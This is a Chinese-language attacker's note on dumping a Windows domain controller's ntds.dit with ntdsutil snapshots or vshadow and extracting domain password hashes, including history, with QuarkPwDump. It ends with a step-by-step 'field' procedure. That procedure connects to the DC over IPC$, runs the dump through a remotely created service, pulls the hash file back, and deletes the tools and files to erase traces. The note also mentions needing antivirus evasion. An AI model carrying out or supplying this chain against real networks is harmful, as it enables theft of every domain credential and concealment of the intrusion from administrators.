ntds.dit的导出+QuarkPwDump读取分析

无法抓取所有用户,需要免杀

这个方法分为两步: 第一步是利用工具导出ntds.dit 第二步是利用QuarkPwDump去分析hash

1、ntds.dit的导出

  1. ntdsutil win2008开始DC中自带的工具

a.交互式

  1. snapshot
  2. activate instance ntds
  3. create
  4. mount xxx

ntds.dit的导出+QuarkPwDump读取分析 - 图1

做完后unmount然后需要再delet一下

ntds.dit的导出+QuarkPwDump读取分析 - 图2

b.非交互

  1. ntdsutil snapshot "activate instance ntds" create quit quit
  2. ntdsutil snapshot "mount {GUID}" quit quit
  3. copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
  4. ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit

ntds.dit的导出+QuarkPwDump读取分析 - 图3

  1. vshadow 微软的卷影拷贝工具
  1. vshadow.exe -exec=%ComSpec% C:

其中%ComSpec%是cmd的绝对路径,它在建立卷影后会启动一个程序,只有这个程序才能卷影进行操作,其他不能,比如这里就是用cmd.exe来的 最后exit一下

ntds.dit的导出+QuarkPwDump读取分析 - 图4

2、QuarkPwDump分析 https://github.com/quarkslab/quarkspwdump

  1. 在线提取
  1. QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit
  1. 离线提取 需要两个文件 ntds.dit 和 system.hiv 其中system.hiv可通过reg save hklm\system system.hiv获取
  1. QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv

ntds.dit的导出+QuarkPwDump读取分析 - 图5

3、实战中hash导出流程

1.建立ipc$连接 net use \\DC1\c$ password /user:username 2.复制文件到DC copy .\* \\DC1\windows\tasks 3.sc建立远程服务启动程序 sc \\DC1 create backupntds binPath= "cmd /c start c:\windows\tasks\shadowcopy.bat" type= share start= auto error= ignore DisplayName= BackupNTDS 4.启动服务 sc \\DC1 start backupntds 5.删除服务 sc \\DC1 delete backupntds 6.讲hash转移到本地 move \\DC1\c$\windows\tasks\hash.txt . 7.删除记录文件 del \\DC1\c$\windows\tasks\ntds.dit \\DC1\c$\windows\tasks\QuarksPwDump.exe \\DC1\c$\windows\tasks\shadowcopy.bat \\DC1\c$\windows\tasks\vshadow.exe

ntds.dit的导出+QuarkPwDump读取分析 - 图6

注意的两点是: a.WORK_PATH和你拷贝的地方要相同 ntds.dit的导出+QuarkPwDump读取分析 - 图7

b.附件中的QuarkPwDump在win08上面运行报错,另外修改版可以,所以实战前还是要测试一下